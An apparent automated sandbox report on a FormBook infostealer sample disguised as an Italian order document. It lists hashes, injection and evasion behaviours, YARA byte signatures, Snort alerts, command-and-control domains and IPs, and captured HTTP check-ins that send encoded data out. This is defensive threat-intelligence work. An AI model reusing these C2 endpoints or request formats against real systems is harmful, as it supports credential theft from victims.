Windows Analysis Report
Requisito ordine n. 230210.exe

Overview

General Information

Sample Name:Requisito ordine n. 230210.exe
Analysis ID:803902
MD5:39f9f9780aff067b147b7adffb960c05
SHA1:30a987113262a366112c8cb91136535abba1b973
SHA256:478bd9421ff11177d8974922f1eec334f1af15845054ce1dbc42b1c9bbd4a484
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • Requisito ordine n. 230210.exe (PID: 5816 cmdline: C:\Users\user\Desktop\Requisito ordine n. 230210.exe MD5: 39F9F9780AFF067B147B7ADFFB960C05)
    • CasPol.exe (PID: 5932 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 4996 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Source | Rule | Description | Author | Strings
      1.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        1.2.CasPol.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x20e63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcbb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        1.2.CasPol.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc77d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fc0a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20bbd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.CasPol.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          1.2.CasPol.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x20063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbdb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          No Sigma rule has matched
          Timestamp:02/10/23-12:45:28.335977
          Source IP:192.168.2.3
          Destination IP:148.251.13.126
          SID:2031453
          Source Port:49692
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/10/23-12:45:54.046998
          Source IP:192.168.2.3
          Destination IP:8.8.8.8
          SID:2023883
          Source Port:61626
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:02/10/23-12:44:55.405933
          Source IP:192.168.2.3
          Destination IP:81.17.18.198
          SID:2031453
          Source Port:49683
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/10/23-12:44:55.405933
          Source IP:192.168.2.3
          Destination IP:81.17.18.198
          SID:2031412
          Source Port:49683
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/10/23-12:45:28.335977
          Source IP:192.168.2.3
          Destination IP:148.251.13.126
          SID:2031449
          Source Port:49692
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/10/23-12:44:55.405933
          Source IP:192.168.2.3
          Destination IP:81.17.18.198
          SID:2031449
          Source Port:49683
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/10/23-12:45:28.335977
          Source IP:192.168.2.3
          Destination IP:148.251.13.126
          SID:2031412
          Source Port:49692
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: Requisito ordine n. 230210.exe | ReversingLabs: Detection: 17%
          Source: Yara match | File source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.frogair.online | Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF | Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/vqh7/ | Avira URL Cloud: Label: malware
          Source: Requisito ordine n. 230210.exe | Joe Sandbox ML: detected
          Source: 1.2.CasPol.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: Requisito ordine n. 230210.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FUCKYOU.pdbBSJB source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmp, Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: explorer.exe, 00000002.00000002.537406866.0000000015163000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003543000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.521972802.0000000000612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000001.00000003.267869685.0000000001469000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.265699663.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.312421979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.313932264.0000000003000000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: explorer.exe, 00000002.00000002.537406866.0000000015163000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003543000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.521972802.0000000000612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FUCKYOU.pdb source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmp, Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000001.00000003.267869685.0000000001469000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.265699663.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.312421979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.313932264.0000000003000000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: CasPol.exe, 00000001.00000002.313724711.0000000003210000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: CasPol.exe, 00000001.00000002.313724711.0000000003210000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: NNbBbB.pdb source: Requisito ordine n. 230210.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_02C331F0 FindFirstFileW,FindNextFileW,FindClose,11_2_02C331F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_02C331E9 FindFirstFileW,FindNextFileW,FindClose,11_2_02C331E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi | 11_2_02C28D70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi | 11_2_02C24DB1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi | 11_2_02C28D6F

          Networking

          Source: C:\Windows\explorer.exe | Network Connect: 148.251.13.126 80
          Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.158 80
          Source: C:\Windows\explorer.exe | Domain query: www.treebarktees.com
          Source: C:\Windows\explorer.exe | Domain query: www.hotelyeah.top
          Source: C:\Windows\explorer.exe | Network Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exe | Domain query: www.jewelryimpact.com
          Source: C:\Windows\explorer.exe | Domain query: www.frogair.online
          Source: C:\Windows\explorer.exe | Domain query: www.krankenzusatz.net
          Source: C:\Windows\explorer.exe | Domain query: www.specigain.online
          Source: C:\Windows\explorer.exe | Network Connect: 199.192.22.198 80
          Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.117 80
          Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.72 80
          Source: C:\Windows\explorer.exe | Domain query: www.tobinrasheedja.cyou
          Source: C:\Windows\explorer.exe | Domain query: www.gachthe365.site
          Source: C:\Windows\explorer.exe | Domain query: www.nativealternatives.com
          Source: C:\Windows\explorer.exe | Network Connect: 103.191.208.50 80
          Source: C:\Windows\explorer.exe | Network Connect: 75.102.22.168 80
          Source: C:\Windows\explorer.exe | Domain query: www.verde-amar.info
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49683 -> 81.17.18.198:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49683 -> 81.17.18.198:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49683 -> 81.17.18.198:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49692 -> 148.251.13.126:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49692 -> 148.251.13.126:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49692 -> 148.251.13.126:80
          Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:61626 -> 8.8.8.8:53
          Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: global traffic | HTTP traffic detected: GET /vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MF HTTP/1.1 | Host: www.jewelryimpact.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MF HTTP/1.1 | Host: www.specigain.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vqh7/?u1ua=avntfzZWwL7S+bFx7xC7yR8pR0BqdKNL+mi6NO8or2/YUjOFXpJJhQb6NE3o2hVXLy/LWl7MJMKHcu5A7Cd4caz4W6nJ0FH5Jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1 | Host: www.treebarktees.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vqh7/?u1ua=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XyI7IXI3QKaXMg==&4sHXq=qmMaHdA-N1MF HTTP/1.1 | Host: www.gachthe365.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF HTTP/1.1 | Host: www.frogair.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1 | Host: www.krankenzusatz.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MF HTTP/1.1 | Host: www.hotelyeah.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 91.195.240.117 91.195.240.117
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.specigain.onlineConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.specigain.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.specigain.online/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 31 79 6e 48 73 72 56 6f 32 46 4e 78 4a 55 30 4a 7e 67 30 4c 4e 6f 67 6a 4b 4b 79 7a 47 33 6f 71 35 42 53 47 34 39 75 69 4c 6e 7e 50 45 63 79 68 7a 38 63 4d 52 38 6c 6f 44 41 45 6a 77 71 30 4e 71 36 77 72 4f 45 65 44 73 62 49 4f 4e 4a 78 6c 77 30 56 4b 4f 71 51 5f 4e 41 33 30 50 54 78 73 54 54 46 4e 79 53 48 7a 51 51 64 5f 68 4a 56 5f 65 63 50 31 47 56 65 63 77 35 47 6d 61 70 37 5f 65 56 63 74 49 58 34 4f 70 30 6f 49 71 6a 39 61 64 62 71 6b 56 46 59 52 6e 38 51 57 49 4d 69 6c 69 71 47 71 58 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: u1ua=g3BtZ4Vv0J161ynHsrVo2FNxJU0J~g0LNogjKKyzG3oq5BSG49uiLn~PEcyhz8cMR8loDAEjwq0Nq6wrOEeDsbIONJxlw0VKOqQ_NA30PTxsTTFNySHzQQd_hJV_ecP1GVecw5Gmap7_eVctIX4Op0oIqj9adbqkVFYRn8QWIMiliqGqXg).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.specigain.onlineConnection: closeContent-Length: 5334Cache-Control: no-cacheOrigin: http://www.specigain.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.specigain.online/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 30 53 58 48 71 36 56 6f 7e 46 4e 79 4d 55 30 4a 70 77 30 50 4e 6f 38 6a 4b 4c 6d 6a 47 6c 45 71 36 53 71 47 35 5a 4f 69 4e 6e 7e 50 56 38 79 74 39 63 64 4e 52 34 4d 45 44 46 35 59 77 6f 59 4e 72 6f 49 72 49 6b 65 45 67 62 49 54 42 70 78 6d 75 45 56 4b 4f 71 4e 63 4e 46 4b 42 50 58 31 73 54 6c 52 4e 79 51 66 77 42 51 64 38 38 35 56 5f 65 63 7a 36 47 56 65 71 77 35 66 74 61 6f 62 5f 66 48 45 74 4b 47 34 4e 74 6b 70 4f 30 7a 38 46 4d 62 58 59 56 6e 30 52 71 75 73 4f 44 5a 6a 41 75 4c 37 77 4c 64 67 5a 6e 44 33 79 59 75 41 74 39 48 47 67 72 37 69 49 46 52 7e 6e 59 37 6f 6a 4b 46 42 39 43 70 58 70 52 61 33 78 75 59 53 39 34 5a 4e 41 31 73 30 72 6e 52 73 74 67 53 43 6a 79 6a 52 55 43 5f 4f 70 30 72 4d 5a 56 67 46 56 59 2d 46 78 76 69 34 67 65 59 57 39 6c 30 4e 70 75 5f 41 35 4d 35 48 4d 6b 56 6b 62 48 78 4d 48 64 57 69 54 50 38 75 39 37 76 58 41 76 49 4d 51 69 49 54 61 58 61 45 2d 76 79 69 33 38 4c 34 47 4e 57 6a 45 78 41 56 54 64 64 33 79 71 73 66 31 45 52 78 50 62 6f 49 41 56 71 6b 59 4c 70 4a 56 32 32 68 77 45 73 77 73 45 50 38 77 72 4a 7e 58 38 69 6e 45 6e 73 69 69 64 6a 41 53 6d 68 59 58 35 51 55 43 51 48 43 38 45 48 47 53 59 5a 59 51 49 4b 6e 58 33 65 6c 61 59 42 68 50 41 67 73 6a 32 5f 4c 4a 5a 4d 31 72 52 62 34 4e 31 55 42 70 4f 47 65 58 59 62 46 51 41 4f 76 47 46 61 46 33 51 39 38 38 46 32 33 6c 6f 58 71 38 6c 41 4d 6a 44 42 64 53 73 44 67 6c 35 41 63 64 74 4f 7e 38 32 48 69 48 51 4e 6b 4c 53 47 73 56 53 33 65 53 64 68 53 4c 66 49 4e 36 68 6b 36 38 56 43 33 4b 6d 58 6a 5f 65 
5f 70 36 39 47 30 2d 57 61 71 66 38 69 67 48 6c 47 62 38 28 71 31 6a 79 4d 55 4a 6e 44 4a 63 49 5a 62 70 4b 30 73 73 51 54 41 79 32 54 67 67 67 61 63 5a 71 4d 56 6f 51 6e 65 6c 49 64 57 42 35 44 77 6f 68 75 64 7a 5a 55 7a 79 7a 45 43 63 67 74 47 39 58 37 33 57 42 67 52 53 30 5a 67 42 45 41 71 6a 4c 5f 36 30 39 6a 71 75 51 48 6c 4a 73 31 45 58 6a 6e 7a 72 76 4c 79 6f 59 43 35 70 53 41 68 77 33 61 58 6c 33 68 74 57 28 42 34 45 4a 67 6b 31 61 41 45 73 6f 78 6e 6b 6a 6b 58 47 6f 61 48 41 31 52 4b 47 46 72 4f 46 38 48 32 65 38 6e 45 37 7e 46 47 61 42 54 58 4c 28 5a 56 4b 31 58 54 54 58 6d 79 39 42 51 41 6c 34 69 4c 4c 7e 55 73 65 67 42 44 71 58 41 67 68 62 2d 56 2d 43 4d 63 55 47 46 56 33 30 48 4b 6b 70 56 51 78 65 47 61 55 77 7a 47 42 34 4b 44 56 75 6a 50 7a 4f 79 45 79 41 42 6e 78 77 65 6a 45 58 39 54 6b 75 45 44 41 72 6f 33 2d 6f 76 63 5f 48 50 72 55 78 64 56 36 6d 57 58 41 50 47 4c 71 72 39 73 2d 4e 43 69 79 52 43 52 6c 44 78 43 57 73 74 75 42 64 59 77 52 42 46 6b 6e 41 49 77 6a 76 39 46 48 6e 5a 5a 56 58 76 56 76 75 3
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.treebarktees.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.treebarktees.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.treebarktees.com/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 58 74 50 4e 63 45 49 6e 7e 62 62 56 31 66 74 61 6d 51 36 59 36 78 6f 6f 56 6d 30 71 65 4e 41 5f 6f 48 79 48 4f 59 67 4a 6a 7a 6e 45 46 69 76 4f 59 61 46 4b 6e 6a 47 37 46 6d 4c 70 70 53 67 50 4e 79 69 50 42 6e 33 57 50 62 6d 43 47 4a 63 34 67 68 46 6c 64 71 71 45 42 2d 37 65 78 57 6e 33 49 34 67 78 77 76 41 34 39 75 47 4d 72 59 65 6c 28 67 54 69 4d 57 79 43 50 63 79 62 36 6d 76 76 36 79 5a 37 4a 31 42 37 64 4b 61 71 45 70 41 2d 28 30 61 4a 30 4b 4f 70 69 36 35 78 28 37 72 38 62 64 36 76 6b 4c 57 34 48 6b 69 6f 33 77 64 55 28 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: u1ua=XtPNcEIn~bbV1ftamQ6Y6xooVm0qeNA_oHyHOYgJjznEFivOYaFKnjG7FmLppSgPNyiPBn3WPbmCGJc4ghFldqqEB-7exWn3I4gxwvA49uGMrYel(gTiMWyCPcyb6mvv6yZ7J1B7dKaqEpA-(0aJ0KOpi65x(7r8bd6vkLW4Hkio3wdU(Q).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.treebarktees.comConnection: closeContent-Length: 5334Cache-Control: no-cacheOrigin: http://www.treebarktees.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.treebarktees.com/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 58 74 50 4e 63 45 49 6e 7e 62 62 56 30 37 52 61 6b 78 36 59 34 52 6f 76 5a 47 30 71 58 74 41 6a 6f 48 7e 48 4f 5a 30 5a 6a 42 4c 45 43 31 6a 4f 59 34 74 4b 6c 6a 47 37 44 6d 4c 74 30 43 67 5a 4e 79 32 70 42 6c 76 47 50 64 7e 43 55 73 51 34 6d 42 46 6d 56 71 71 46 52 75 37 64 28 32 6e 33 49 34 73 58 77 74 70 46 39 74 57 4d 71 75 43 6c 28 6d 48 68 4b 47 79 44 47 38 79 62 36 6d 6a 4a 36 79 5a 72 4a 31 59 6a 64 4a 43 71 45 5f 73 2d 73 31 61 57 7a 61 4f 55 74 71 34 74 35 70 4f 6f 56 50 36 62 6f 4c 61 36 49 69 79 39 30 51 41 65 39 54 62 41 44 43 46 6d 65 4d 6a 4d 67 6b 37 6e 71 4f 39 76 73 36 28 6e 44 63 43 5f 70 56 58 76 4f 6f 7e 62 63 68 34 39 75 31 57 4f 57 4a 53 58 7a 69 6b 75 4d 70 58 33 62 54 75 77 47 68 53 62 79 78 4e 48 50 79 4a 6b 65 44 56 53 39 7a 6d 74 69 42 70 32 75 34 32 44 4d 37 78 47 67 48 49 51 33 7a 32 66 61 53 74 69 4c 53 63 59 71 57 6b 6f 5a 65 7e 47 6c 34 58 37 47 73 4a 49 31 52 61 79 7e 77 42 69 6b 52 46 71 4c 42 7e 6a 6a 58 79 7a 4f 63 76 30 30 6b 4b 56 4f 77 52 47 42 6f 35 56 72 54 30 55 39 4f 54 77 6f 6a 6c 44 6b 2d 52 41 55 31 55 2d 4a 4e 42 50 72 64 45 46 4f 5a 6c 5f 5a 4b 57 74 42 79 46 33 54 54 42 43 71 70 68 57 64 67 6e 6f 49 79 59 42 79 62 64 56 7a 78 58 35 28 71 6d 77 76 4a 59 70 52 49 53 73 35 46 4d 68 38 57 54 47 53 42 62 52 34 6a 37 6d 52 54 79 33 4e 64 6b 4f 49 39 4f 5f 59 32 5a 63 69 51 63 7a 47 39 31 32 55 79 65 73 50 55 50 74 34 67 37 6b 71 5f 65 2d 4f 31 73 47 76 79 58 6e 61 64 6f 47 77 50 7a 56 46 43 74 7a 66 36 36 35 70 78 6f 79 56 53 34 63 75 73 34 48 6c 34 7e 51 28 2d 4f 44 6c 
